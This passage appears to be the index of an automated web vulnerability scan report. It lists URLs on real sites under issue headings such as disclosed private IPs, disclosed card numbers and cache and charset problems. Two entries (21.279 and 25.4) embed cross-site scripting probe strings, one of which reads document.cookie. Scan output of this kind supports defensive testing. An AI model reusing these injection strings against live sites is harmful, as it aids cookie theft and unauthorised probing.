21.149. http://blekko.com/ws/xss+cloudscan+/blekko/groundhog-day

21.150. http://blekko.com/ws/xss+cloudscan+/date

21.151. http://blekko.com/ws/xss+cloudscan+/rank

21.152. http://blekko.com/ws/xss+cloudscan+/rss

21.153. http://blekko.com/ws/xss+cloudscan+/shop

21.154. http://blekko.com/ws/xss+cloudscan+/site=

21.155. http://blekko.com/ws/xss+cloudscan+/site=cloudscan.blogspot.com

21.156. http://blekko.com/ws/xss+cloudscan+/youtube

21.157. http://blekko.com/ws/xss/

21.158. https://blekko.com/join

21.159. https://blekko.com/login

21.160. https://blekko.com/s/images/wait24trans.gif

21.161. https://blekko.com/ws/+/privacy

21.162. https://blekko.com/ws/+/terms

21.163. http://boardreader.com/affiliate/gagbanner.html

21.164. http://boardreader.com/info/policy.htm

21.165. http://boardreader.com/info/submit.htm

21.166. http://boardreader.com/js/dyn/b78df7b9a5de6ff283b7cf94ec615217.js

21.167. http://boardreader.com/opensearch.xml

21.168. http://clickaider.com/

21.169. http://code.google.com/p/swfobject/

21.170. https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js

21.171. http://cosmiclog.msnbc.msn.com/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz

21.172. http://dean.edwards.name/weblog/2006/06/again/

21.173. http://developers.facebook.com/devgarage

21.174. http://developers.facebook.com/docs/opengraph

21.175. http://dillerdesign.com/experiment/DD_belatedPNG/

21.176. http://editorial.autos.msn.com/blogs/autosblog.aspx

21.177. http://erncpa.com/

21.178. https://faq.orbitz.com/app/answers/detail/a_id/15644

21.179. http://feeds.feedburner.com/omniture/blogs/all

21.180. http://forums.plentyoffish.com/datingposts6866122.aspx

21.181. http://gocitykids.parentsconnect.com/data/service-calendar.json

21.182. http://golem.ph.utexas.edu/~distler/blog/atom10.xml

21.183. http://groups.google.com/groups

21.184. http://gsgd.co.uk/sandbox/jquery/easing/

21.185. http://ie6funeral.com/

21.186. http://johannburkard.de/blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html

21.187. http://jquery.malsup.com/license.html

21.188. http://jqueryui.com/about

21.189. http://lec.edu/fckeditor/editor/fckeditor.php

21.190. http://login.live.com/login.srf

21.191. https://login.live.com/login.srf

21.192. http://medienfreunde.com/lab/innerfade/js/jquery.innerfade.js

21.193. http://mir.aculo.us/

21.194. http://mofones.com/

21.195. http://movies.msn.com/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

21.196. http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/

21.197. http://movies.msn.com/paralleluniverse/in-praise-of-buried/story/across-the-universe/

21.198. http://movies.msn.com/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/

21.199. http://pressroom.orbitz.com/

21.200. https://publish.omniture.com/center/util/

21.201. http://scripts.omniture.com/javascript.js

21.202. https://secure.avangate.com/order/nojs.php

21.203. https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js

21.204. https://sitesearch.omniture.com/center/util/

21.205. http://stackoverflow.com/questions/1890512/handling-errors-in-jquerydocument-ready

21.206. http://static1.degreetree.com/fossa/assets/jsx/ext-2.2.1/ext.js

21.207. http://today.msnbc.msn.com/id/41302280/ns/today-entertainment/

21.208. http://trw.mediaroom.com/index.php

21.209. http://tv.msn.com/last-night-on-tv/

21.210. http://twitter.com/JohnsHopkinsSPH

21.211. http://twitter.com/about/contact

21.212. http://twitter.com/arnui

21.213. http://twitter.com/javascripts/widgets/widget.js

21.214. https://twitter.com/about/contact

21.215. https://twitter.com/signup

21.216. http://webcache.googleusercontent.com/search

21.217. http://webreflection.blogspot.com/2009/01/32-bytes-to-know-if-your-browser-is-ie.html

21.218. https://www.astaro.co.uk/beacon/(beid

21.219. http://www.astaro.com/

21.220. http://www.astaro.com/advanced

21.221. http://www.astaro.com/buy-astaro

21.222. http://www.astaro.com/callback

21.223. http://www.astaro.com/company/advanced

21.224. http://www.astaro.com/company/astaro-management-team

21.225. http://www.astaro.com/company/astaro-supervisory-board

21.226. http://www.astaro.com/company/career

21.227. http://www.astaro.com/company/company-profile

21.228. http://www.astaro.com/company/contact-astaro

21.229. http://www.astaro.com/company/javascript:void()

21.230. http://www.astaro.com/company/sponsorship

21.231. http://www.astaro.com/company/worldwide-offices

21.232. http://www.astaro.com/gateway/builder/settings

21.233. http://www.astaro.com/javascript:void()

21.234. http://www.astaro.com/landingpages/data/en-privacy-policy.html

21.235. http://www.astaro.com/legal-statement

21.236. http://www.astaro.com/newsletter

21.237. http://www.astaro.com/products

21.238. http://www.astaro.com/products/access-points

21.239. http://www.astaro.com/products/astaro-clients

21.240. http://www.astaro.com/products/astaro-command-center

21.241. http://www.astaro.com/products/astaro-red

21.242. http://www.astaro.com/products/astaro-security-gateway-software-appliance

21.243. http://www.astaro.com/products/astaro-security-gateway-virtual-appliance-for-vmware

21.244. http://www.astaro.com/products/astaro-smart-installer

21.245. http://www.astaro.com/products/hardware-appliances

21.246. https://www.astaro.com/beacon/(beid

21.247. https://www.astaro.com/design/en/javascript/jquery.dimensions.js

21.248. https://www.astaro.com/en

21.249. https://www.astaro.com/en/content/advancedsearch

21.250. https://www.astaro.com/en/myastaro

21.251. https://www.astaro.com/en/myastaro/contact_us

21.252. https://www.astaro.com/en/user/login

21.253. https://www.astaro.com/tool/signup

21.254. https://www.astaro.com/user/login

21.255. https://www.astaro.de/beacon/(beid

21.256. http://www.astaro.es/

21.257. https://www.astaro.net/beacon/(beid

21.258. http://www.bing.com/s/osd3.xml

21.259. http://www.cs.tut.fi/~jkorpela/quirks-mode.html,

21.260. http://www.dillerdesign.com/experiment/DD_belatedPNG/

21.261. http://www.directstartv.com/

21.262. http://www.ehow.com/about_us/about_us.aspx

21.263. http://www.ehow.com/about_us/faq_ehow.aspx

21.264. http://www.ehow.com/privacy.aspx

21.265. http://www.ehow.com/terms_use.aspx

21.266. https://www.ehow.com/privacy.aspx

21.267. https://www.ehow.com/terms_use.aspx

21.268. http://www.exploit-db.com/exploits/15313/

21.269. http://www.faneuilhallmarketplace.com/

21.270. http://www.gnu.org/copyleft/gpl.html

21.271. http://www.gnu.org/licenses/gpl.html

21.272. http://www.google.com/finance

21.273. http://www.google.com/search

21.274. https://www.google.com/accounts/Login

21.275. http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/

21.276. http://www.huddletogether.com/projects/lightbox2/

21.277. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/DD_belatedPNG_0.0.8a-min.js

21.278. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/custom.js

21.279. http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/a

21.280. http://www.millenniumhotels.co.nz/copthorneaucklandcity/index.html

21.281. http://www.millenniumhotels.co.nz/copthornebayofislands/index.html

21.282. http://www.millenniumhotels.co.nz/copthornechristchurchairport/index.html

21.283. http://www.millenniumhotels.co.nz/copthornechristchurchcentral/index.html

21.284. http://www.millenniumhotels.co.nz/copthornechristchurchcity/index.html

21.285. http://www.millenniumhotels.co.nz/copthornedurhamstreet/index.html

21.286. http://www.millenniumhotels.co.nz/copthorneharbourcity/index.html

21.287. http://www.millenniumhotels.co.nz/copthornehokianga/index.html

21.288. http://www.millenniumhotels.co.nz/copthornemarlborough/index.html

21.289. http://www.millenniumhotels.co.nz/copthornenewplymouth/index.html

21.290. http://www.millenniumhotels.co.nz/copthorneorientalbay/index.html

21.291. http://www.millenniumhotels.co.nz/copthornequeenstownlakefront/index.html

21.292. http://www.millenniumhotels.co.nz/copthornewairarapa/index.html

21.293. http://www.millenniumhotels.co.nz/kingsgateauckland/index.html

21.294. http://www.millenniumhotels.co.nz/kingsgatedunedin/index.html

21.295. http://www.millenniumhotels.co.nz/kingsgategreymouth/index.html

21.296. http://www.millenniumhotels.co.nz/kingsgatehamilton/index.html

21.297. http://www.millenniumhotels.co.nz/kingsgateoamaru/index.html

21.298. http://www.millenniumhotels.co.nz/kingsgatepaihia/index.html

21.299. http://www.millenniumhotels.co.nz/kingsgatepalmerstonnorth/index.html

21.300. http://www.millenniumhotels.co.nz/kingsgatequeenstown/index.html

21.301. http://www.millenniumhotels.co.nz/kingsgaterotorua/index.html

21.302. http://www.millenniumhotels.co.nz/kingsgateteanau/index.html

21.303. http://www.millenniumhotels.co.nz/kingsgatewanganui/index.html

21.304. http://www.millenniumhotels.co.nz/kingsgatewellington/index.html

21.305. http://www.millenniumhotels.co.nz/kingsgatewhangarei/index.html

21.306. http://www.millenniumhotels.co.nz/millenniumchristchurch/index.html

21.307. http://www.millenniumhotels.co.nz/millenniumqueenstown/index.html

21.308. http://www.millenniumhotels.co.nz/millenniumrotorua/index.html

21.309. http://www.millenniumhotels.co.nz/millenniumtaupo/index.html

21.310. http://www.millenniumhotels.co.uk/copthorneaberdeen/index.html

21.311. http://www.millenniumhotels.co.uk/copthornebirmingham/index.html

21.312. http://www.millenniumhotels.co.uk/copthornecardiff/index.html

21.313. http://www.millenniumhotels.co.uk/copthornedudley/index.html

21.314. http://www.millenniumhotels.co.uk/copthorneeffinghamgatwick/index.html

21.315. http://www.millenniumhotels.co.uk/copthornegatwick/index.html

21.316. http://www.millenniumhotels.co.uk/copthornemanchester/index.html

21.317. http://www.millenniumhotels.co.uk/copthornenewcastle/index.html

21.318. http://www.millenniumhotels.co.uk/copthorneplymouth/index.html

21.319. http://www.millenniumhotels.co.uk/copthornereading/index.html

21.320. http://www.millenniumhotels.co.uk/copthornesheffield/index.html

21.321. http://www.millenniumhotels.co.uk/copthornesloughwindsor/index.html

21.322. http://www.millenniumhotels.co.uk/copthornetarakensington/index.html

21.323. http://www.millenniumhotels.co.uk/millenniumcopthornechelseafc/index.html

21.324. http://www.millenniumhotels.co.uk/millenniumglasgow/index.html

21.325. http://www.millenniumhotels.co.uk/millenniumgloucester/index.html

21.326. http://www.millenniumhotels.co.uk/millenniumkensington/index.html

21.327. http://www.millenniumhotels.co.uk/millenniumknightsbridge/index.html

21.328. http://www.millenniumhotels.co.uk/millenniummayfair/index.html

21.329. http://www.millenniumhotels.co.uk/millenniumreading/index.html

21.330. http://www.millenniumhotels.com/ae/copthornehoteldubai/index.html

21.331. http://www.millenniumhotels.com/ae/goldmohurhoteladen/index.html

21.332. http://www.millenniumhotels.com/ae/grandmillenniumalwahda/index.html

21.333. http://www.millenniumhotels.com/ae/grandmillenniumdubai/index.html

21.334. http://www.millenniumhotels.com/ae/kingsgateabudhabi/index.html

21.335. http://www.millenniumhotels.com/ae/millenniumabudhabi/index.html

21.336. http://www.millenniumhotels.com/ae/millenniumdubai/index.html

21.337. http://www.millenniumhotels.com/cn/copthorneqingdao/index.html

21.338. http://www.millenniumhotels.com/cn/grandmillenniumbeijing/index.html

21.339. http://www.millenniumhotels.com/cn/millenniumchengdu/index.html

21.340. http://www.millenniumhotels.com/cn/millenniumshanghai/index.html

21.341. http://www.millenniumhotels.com/cn/millenniumwuxi/index.html

21.342. http://www.millenniumhotels.com/cn/millenniumxiamen/index.html

21.343. http://www.millenniumhotels.com/corporate/hotels/kingsgateHotels.htm

21.344. http://www.millenniumhotels.com/corporate/legalInfo.html

21.345. http://www.millenniumhotels.com/corporate/privacyPolicy.html

21.346. http://www.millenniumhotels.com/corporate/termsConditions.html

21.347. http://www.millenniumhotels.com/de/copthornehannover/index.html

21.348. http://www.millenniumhotels.com/de/millenniumstuttgart/index.html

21.349. http://www.millenniumhotels.com/fr/millenniumcharlesdegaulle/index.html

21.350. http://www.millenniumhotels.com/fr/millenniumparis/index.html

21.351. http://www.millenniumhotels.com/id/millenniumjakarta/index.html

21.352. http://www.millenniumhotels.com/kw/aljahrahcopthornekuwait/index.html

21.353. http://www.millenniumhotels.com/millenniumanchorage/index.html

21.354. http://www.millenniumhotels.com/millenniumboston/attractions/

21.355. http://www.millenniumhotels.com/millenniumboston/attractions/Green_Policy.html

21.356. http://www.millenniumhotels.com/millenniumboston/attractions/Logan_International_Airport.html

21.357. http://www.millenniumhotels.com/millenniumboston/attractions/index.html

21.358. http://www.millenniumhotels.com/millenniumboston/contactus/index.html

21.359. http://www.millenniumhotels.com/millenniumboston/facilities/

21.360. http://www.millenniumhotels.com/millenniumboston/facilities/index.html

21.361. http://www.millenniumhotels.com/millenniumboston/forms/optInForm.html

21.362. http://www.millenniumhotels.com/millenniumboston/gallery/index.html

21.363. http://www.millenniumhotels.com/millenniumboston/index.html

21.364. http://www.millenniumhotels.com/millenniumboston/meeting/index.html

21.365. http://www.millenniumhotels.com/millenniumboston/news/index.html

21.366. http://www.millenniumhotels.com/millenniumboston/restaurant/

21.367. http://www.millenniumhotels.com/millenniumboston/restaurant/index.html

21.368. http://www.millenniumhotels.com/millenniumboston/rooms/

21.369. http://www.millenniumhotels.com/millenniumboston/rooms/index.html

21.370. http://www.millenniumhotels.com/millenniumboston/rooms/suite.html

21.371. http://www.millenniumhotels.com/millenniumboston/specials/index.html

21.372. http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html

21.373. http://www.millenniumhotels.com/millenniumboulder/index.html

21.374. http://www.millenniumhotels.com/millenniumbuffalo/index.html

21.375. http://www.millenniumhotels.com/millenniumchicago/index.html

21.376. http://www.millenniumhotels.com/millenniumcincinnati/index.html

21.377. http://www.millenniumhotels.com/millenniumdurham/index.html

21.378. http://www.millenniumhotels.com/millenniumlosangeles/index.html

21.379. http://www.millenniumhotels.com/millenniumminneapolis/index.html

21.380. http://www.millenniumhotels.com/millenniumnashville/index.html

21.381. http://www.millenniumhotels.com/millenniumnewyork/index.html

21.382. http://www.millenniumhotels.com/millenniumscottsdale/index.html

21.383. http://www.millenniumhotels.com/millenniumstlouis/index.html

21.384. http://www.millenniumhotels.com/millenniumunplazanewyork/index.html

21.385. http://www.millenniumhotels.com/my/copthornepenang/index.html

21.386. http://www.millenniumhotels.com/opening/millenniumveetaichung.html

21.387. http://www.millenniumhotels.com/ph/heritagemanila/index.html

21.388. http://www.millenniumhotels.com/premierhotelnewyork/index.html

21.389. http://www.millenniumhotels.com/qa/millenniumdoha/index.html

21.390. http://www.millenniumhotels.com.cn/

21.391. http://www.millenniumhotels.com.sg/StudioMHotel/index.html

21.392. http://www.millenniumhotels.com.sg/copthornekingssingapore/index.html

21.393. http://www.millenniumhotels.com.sg/copthorneorchidsingapore/index.html

21.394. http://www.millenniumhotels.com.sg/grandcopthornewaterfront/index.html

21.395. http://www.millenniumhotels.com.sg/mhotelsingapore/index.html

21.396. http://www.millenniumhotels.com.sg/orchardhotelsingapore/index.html

21.397. http://www.msnbc.msn.com/id/3032118/ns/technology_and_science

21.398. http://www.msnbc.msn.com/id/41274431/ns/world_news-weird_news/

21.399. http://www.msnbc.msn.com/id/41292533/ns/technology_and_science-science/

21.400. http://www.msnbc.msn.com/id/41299984/ns/health-cancer/from/toolbar

21.401. http://www.msnbc.msn.com/id/41354775/ns/business-business_of_super_bowl_xlv/

21.402. http://www.msnbc.msn.com/id/41357424/ns/health-kids_and_parenting

21.403. http://www.msnbc.msn.com/id/41359879/ns/us_news-life/

21.404. http://www.msnbc.msn.com/id/41360579/ns/us_news-crime_and_courts

21.405. http://www.msnbc.msn.com/id/41362386/ns/local_news-dallasfort_worth_tx/

21.406. http://www.msnbc.msn.com/id/41362578/ns/local_news-dallasfort_worth_tx/

21.407. http://www.msnbc.msn.com/id/41363059/ns/local_news-dallasfort_worth_tx/

21.408. http://www.msnbc.msn.com/id/41363738/ns/weather

21.409. http://www.msnbc.msn.com/id/41363935/ns/world_news-mideastn_africa/

21.410. http://www.msnbc.msn.com/id/41364449/ns/world_news-the_new_york_times

21.411. http://www.msnbc.msn.com/id/41365053

21.412. http://www.msnbc.msn.com/id/41365053/ns/weather/

21.413. http://www.msnbc.msn.com/id/41366134/ns/world_news-mideastn_africa

21.414. http://www.msnbc.msn.com/id/41367374/ns/world_news-europe

21.415. http://www.nolanfans.com/

21.416. http://www.omniture.com/en/education

21.417. http://www.omniture.com/en/education/academic_initiative

21.418. http://www.omniture.com/en/education/certification

21.419. http://www.omniture.com/en/education/certification/implementation

21.420. http://www.omniture.com/en/education/certification/insight_analyst

21.421. http://www.omniture.com/en/education/certification/insight_architect

21.422. http://www.omniture.com/en/education/certification/search_center

21.423. http://www.omniture.com/en/education/certification/site_catalyst

21.424. http://www.omniture.com/en/education/certification/support

21.425. http://www.omniture.com/en/education/certification/test_target

21.426. http://www.omniture.com/en/education/courses/discover

21.427. http://www.omniture.com/en/education/courses/dop_analyst

21.428. http://www.omniture.com/en/education/courses/merchandising

21.429. http://www.omniture.com/en/education/courses/online_marketing_suite

21.430. http://www.omniture.com/en/education/courses/sbu

21.431. http://www.omniture.com/en/education/courses/searchcenter

21.432. http://www.omniture.com/en/education/courses/sitesearch

21.433. http://www.omniture.com/en/education/courses/survey

21.434. http://www.omniture.com/en/education/courses/testandtarget

21.435. http://www.omniture.com/en/privacy/policy

21.436. http://www.omniture.com/press/867

21.437. http://www.omniture.com/press/868

21.438. http://www.opensource.org/licenses/gpl-license.php

21.439. http://www.opensource.org/licenses/mit-license.php

21.440. http://www.orbitz.com/pagedef/content/legal/bestPriceGuarantee.jsp

21.441. http://www.orbitz.com/shared/js/lib/scriptaculous/src/controls.js

21.442. http://www.orbitz.com/shared/js/lib/scriptaculous/src/dragdrop.js

21.443. http://www.orbitz.com/shared/pagedef/content/legal/lowFarePromise.jsp

21.444. http://www.owasp.org/index.php

21.445. http://www.rascals.eu/

21.446. http://www.revresda.com/event.ng/Type=count&FlightID=64511&AdID=121020&TargetID=30062&Segments=65,3724,4979,7409,7949,8303,8773,11672,12591,22067,22782,24028,28587,28592,30359,34504,38844,38856,39489,41245,42484,45767,47055,47147,47283,47895,48051,48208,49979,50256,50391,50409,50628,50828,50930,51282,51416,51693,51699,51872,52218&Targets=30062,30058,52137&Values=31,43,60,82,90,100,152,200,264,32520,32876,33113,33155,33222,33232,33247,34023,34137,34172,34581,34634,34641,34777,34959,34960,35052,35154,35272,35370,35582,35643,35657,35682,35771,35921,36063,42667,66797,66867,67440,67898,67941,67944,68027,68088,68179,68180,68236,68270,68295,68318,68322,68325,68326,68359,68363,68367,68376,102874,102875,103013,103016&RawValues=&/

21.447. http://www.revresda.com/event.ng/Type=count&FlightID=64511&AdID=121020&TargetID=30062&Segments=65,3724,4979,7409,7949,8303,8773,11672,12591,22067,22782,24028,28587,28592,30359,34504,38844,38856,39489,41245,42484,45767,47055,47147,47283,47895,48051,48208,49979,50256,50391,50409,50628,50828,50930,51282,51416,51693,51699,51872,52218&Targets=30062,30058,52137&Values=46,60,82,90,100,152,200,264,32520,32876,33113,33155,33222,33232,33247,34023,34137,34172,34581,34634,34641,34777,34959,34960,35052,35154,35272,35370,35582,35643,35657,35682,35771,35921,36063,42667,66797,67440,67898,67941,67944,68027,68032,68088,68179,68180,68236,68270,68295,68318,68322,68325,68326,68359,68363,68367,68375,102874,102875,103013,103016&RawValues=&/

21.448. http://www.robtex.com/as/as15169.html

21.449. http://www.robtex.com/as/as26415.html

21.450. http://www.robtex.com/as/as36617.html

21.451. http://www.robtex.com/as/as36618.html

21.452. http://www.robtex.com/as/as36620.html

21.453. http://www.robtex.com/as/as36621.html

21.454. http://www.robtex.com/as/as36623.html

21.455. http://www.robtex.com/as/as36624.html

21.456. http://www.robtex.com/as/as36625.html

21.457. http://www.robtex.com/as/as36626.html

21.458. http://www.robtex.com/as/as36629.html

21.459. http://www.robtex.com/dns/orkut.com.html

21.460. http://www.robtex.com/faq.html

21.461. http://www.scmagazineus.com/search/xss/

21.462. http://www.sitepoint.com/article/browser-specific-css-hacks

21.463. http://www.threatexpert.com/contact.aspx

21.464. http://www.trip.com/

21.465. http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html

21.466. http://www.w3.org/TR/html4/strict.dtd

21.467. http://www.wordpresstemplates.com/

21.468. http://www.worldmastiffforum.com/

21.469. http://www.xss.com/

21.470. http://xss-proxy.sourceforge.net/

22. Private IP addresses disclosed

22.1. http://blog.threatexpert.com/

22.2. http://businessonmain.msn.com/videos/coolrunnings.aspx

22.3. https://login.facebook.com/ajax/intl/language_dialog.php

22.4. https://login.facebook.com/ajax/intl/language_dialog.php

22.5. http://pixel.facebook.com/ajax/register/logging.php

22.6. http://pixel.facebook.com/ajax/register/logging.php

22.7. http://vimeo.com/moogaloop.swf

22.8. http://vimeo.com/moogaloop.swf

22.9. http://vimeo.com/moogaloop.swf

22.10. http://www.facebook.com/ajax/intl/language_dialog.php

22.11. http://www.facebook.com/ajax/intl/language_dialog.php

22.12. http://www.facebook.com/ajax/intl/language_dialog.php

22.13. http://www.facebook.com/ajax/reg_birthday_help.php

22.14. http://www.facebook.com/platform

22.15. http://www.google.com/sdch/GeNLY2f-.dct

22.16. http://www.msnbc.msn.com/

22.17. http://www.msnbc.msn.com/id/3032072/ns/business

22.18. http://www.msnbc.msn.com/id/3032076/ns/health

22.19. http://www.msnbc.msn.com/id/3032118/ns/technology_and_science

22.20. http://www.msnbc.msn.com/id/3032507/ns/world_news

22.21. http://www.msnbc.msn.com/id/3032525/ns/us_news

22.22. http://www.msnbc.msn.com/id/3032553/ns/politics

22.23. http://www.pctools.com/registry-mechanic/

22.24. http://www.robtex.com/as/as15169.html

22.25. http://www.scmagazineus.com/search/xss/

23. Credit card numbers disclosed

23.1. https://ads.pof.com/assets/pdf/POF-HelpDoc.pdf

23.2. http://maps.google.com/maps

23.3. http://www.bing.com/travel/content/search

23.4. http://www.ehow.com/how_2113353_end-sibling-feuds.html

23.5. http://www.robtex.com/as/as36623.html

24. Robots.txt file

24.1. http://go.microsoft.com/fwlink/

24.2. http://id.google.com/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif

24.3. http://pixel.facebook.com/ajax/register/logging.php

24.4. http://safebrowsing.clients.google.com/safebrowsing/downloads

24.5. http://toolbarqueries.clients.google.com/tbproxy/af/query

24.6. http://www.astaro.com/newsletter

24.7. https://www.astaro.com/design/en/javascript/main.js

24.8. http://www.google-analytics.com/siteopt.js

24.9. http://www.googleadservices.com/pagead/conversion/1072269077/

25. Cacheable HTTPS response

25.1. https://adadvisor.net/adscores/g.json

25.2. https://ads.pof.com/

25.3. https://ads.pof.com/Default.aspx

25.4. https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176)

25.5. https://ads.pof.com/Default.aspx/assets/png/create_your_first_ad.png

25.6. https://ads.pof.com/assets/pdf/POF-HelpDoc.pdf

25.7. https://ads.pof.com/ui/Message.aspx

25.8. https://ads.pof.com/ui/RetrievePassword.aspx

25.9. https://amihackerproof.com/about_us.php

25.10. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

25.11. https://gc.synxis.com/XBE/Popups/InfoPopup.aspx

25.12. https://gc.synxis.com/XBE/ScriptResource.axd

25.13. https://gc.synxis.com/XBE/WebResource.axd

25.14. https://gc.synxis.com/rez.aspx

25.15. https://gc.synxis.com/xbe/Services/XbeService.asmx/CheckForPackages

25.16. https://gc.synxis.com/xbe/rez.aspx

25.17. https://hostedusa3.whoson.com/chat/chatstart.htm

25.18. https://leads.demandbase.com/

25.19. https://login.facebook.com/ajax/intl/language_dialog.php

25.20. https://maps-api-ssl.google.com/maps

25.21. https://maps-api-ssl.google.com/maps/api/js

25.22. https://my.omniture.com/login/

25.23. https://my.omniture.com/p/suite/1.2/index.html

25.24. https://my.omniture.com/p/suite/current/authentication/get_login_domain.html

25.25. https://my.omniture.com/password_recovery.html

25.26. https://my.omniture.com/support_popup_form.html

25.27. https://picasaweb.google.com/lh/view

25.28. https://publish.omniture.com/center/

25.29. https://publish.omniture.com/center/util/

25.30. https://secure.opinionlab.com/ccc01/o.asp

25.31. https://sitesearch.omniture.com/center/

25.32. https://sitesearch.omniture.com/center/util/

25.33. https://trustseal.verisign.com/getseal

25.34. https://trustsealinfo.verisign.com/splash

25.35. https://twitter.com/jobs

25.36. https://twitter.com/oexchange.xrd

25.37. https://www.astaro.com/design/en/images/icons/favicon.ico

25.38. https://www.ehow.com/account/facebook_merge.aspx

25.39. https://www.ehow.com/account/simple_login.aspx

25.40. https://www.ehow.com/account/simple_register.aspx

25.41. https://www.ehow.com/ajax/loginbyfacebookid.aspx

25.42. https://www.ehow.com/forms/

25.43. https://www.ehow.com/forms/PasswordRetrieval.aspx

25.44. https://www.ehow.com/forms/signin.aspx

25.45. https://www.ehow.com/privacy.aspx

25.46. https://www.ehow.com/terms_use.aspx

25.47. https://www.ehow.com/xd_receiver.htm

26. Multiple content types specified

27. HTML does not specify charset

27.1. http://a0.twimg.com/a/1296609216/stylesheets/fronts.css

27.2. http://a0.twimg.com/profile_images/1160091262/science100x100_normal.jpg

27.3. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033

27.4. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24

27.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.91

27.6. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67

27.7. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.11

27.8. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4

27.9. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.5

27.10. http://ad.doubleclick.net/adi/N553.msn.com/B5114832.2

27.11. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.5

27.12. http://ad.doubleclick.net/adi/dmd.ehow/computers

27.13. http://ad.doubleclick.net/adi/dmd.ehow/homepage

27.14. http://ad.doubleclick.net/clk

27.15. http://ad.yieldmanager.com/iframe3

27.16. https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js

27.17. https://admin.testandtarget.omniture.com/skins/omniture/terms_of_use.html

27.18. http://amihackerproof.com/

27.19. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

27.20. http://dillerdesign.com/experiment/DD_belatedPNG/

27.21. http://ds.addthis.com/red/psi/p.json

27.22. http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json

27.23. http://fast.dm.demdex.net/dm-dest.html

27.24. http://hit.clickaider.com/pv

27.25. http://hostedusa3.whoson.com/

27.26. http://hostedusa3.whoson.com/include.js

27.27. http://hostedusa3.whoson.com/invite.js

27.28. http://hostedusa3.whoson.com/poll.gif

27.29. http://hostedusa3.whoson.com/stat.gif

27.30. http://jqueryui.com/about

27.31. http://kona10.kontera.com/

27.32. http://kona5.kontera.com/favicon.ico

27.33. http://local.msn.com/ten-day.aspx

27.34. http://local.msn.com/weather.aspx

27.35. http://now.eloqua.com/visitor/v200/svrGP.aspx

27.36. http://pixel.invitemedia.com/data_sync

27.37. http://r.nexac.com/e/getdata.xgi

27.38. http://seg.sharethis.com/getSegment.php

27.39. http://showads.pubmatic.com/AdServer/AdServerServlet

27.40. http://sr2.liveperson.net/visitor/addons/deploy.asp

27.41. https://trustsealinfo.verisign.com/splash

27.42. http://uac.advertising.com/wrapper/aceUACping.htm

27.43. http://wp-superslider.com/index.php

27.44. http://www.amihackerproof.com/

27.45. http://www.autocheck.com/

27.46. http://www.dillerdesign.com/experiment/DD_belatedPNG/

27.47. http://www.ehow.co.uk/

27.48. http://www.ehow.com/xd_receiver.htm

27.49. https://www.ehow.com/xd_receiver.htm

27.50. http://www.google.com/instant/

27.51. http://www.google.com/intl/en/about.html

27.52. http://www.google.com/intl/en/ads/

27.53. http://www.google.com/intl/en/options/

27.54. http://www.opinionlab.com/ozone/24-7.asp

27.55. http://www.orbitz.com/App/ViewDHTMLCalendar

27.56. http://www.orbitz.com/App/ViewTravelWatchHome

27.57. http://www.orbitz.com/cacheable/ad.html

27.58. http://www.orbitz.com/cacheable/ad_empty.html

27.59. http://www.orbitz.com/cacheable/empty.html

27.60. http://www.orbitz.com/shared/adserverProxy.jsp

27.61. https://www.orbitz.com/Secure/ViewSecureCalendar

27.62. http://www.ppcse.net/

27.63. http://www.robtex.com/ext/ads/nb728.html

27.64. http://www.robtex.com/ext/ads/nt728.html

27.65. http://www.stocktrader.org.uk/remote2/ST1-

27.66. http://www.stocktrader.org.uk/remote2/ST1-1.php

27.67. http://www.stocktrader.org.uk/remote2/ST1-2.php

27.68. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

27.69. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

27.70. http://www.wizzsurf.com/

27.71. http://www.worldmastiffforum.com/favicon.ico

27.72. http://xss-proxy.sourceforge.net/

28. HTML uses unrecognised charset

28.1. http://ccc01.opinionlab.com/o.asp

28.2. https://faq.orbitz.com/

28.3. https://faq.orbitz.com/app/answers/detail/a_id/15644

28.4. https://secure.opinionlab.com/ccc01/o.asp

29. Content type incorrectly stated

29.1. http://a.rad.msn.com/ADSAdClient31.dll

29.2. https://a248.e.akamai.net/demdex.download.akamai.com/dm/

29.3. http://a3.twimg.com/profile_images/299906134/acangiano_normal.gif

29.4. http://ad.doubleclick.net/clk

29.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683213**

29.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683295**

29.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

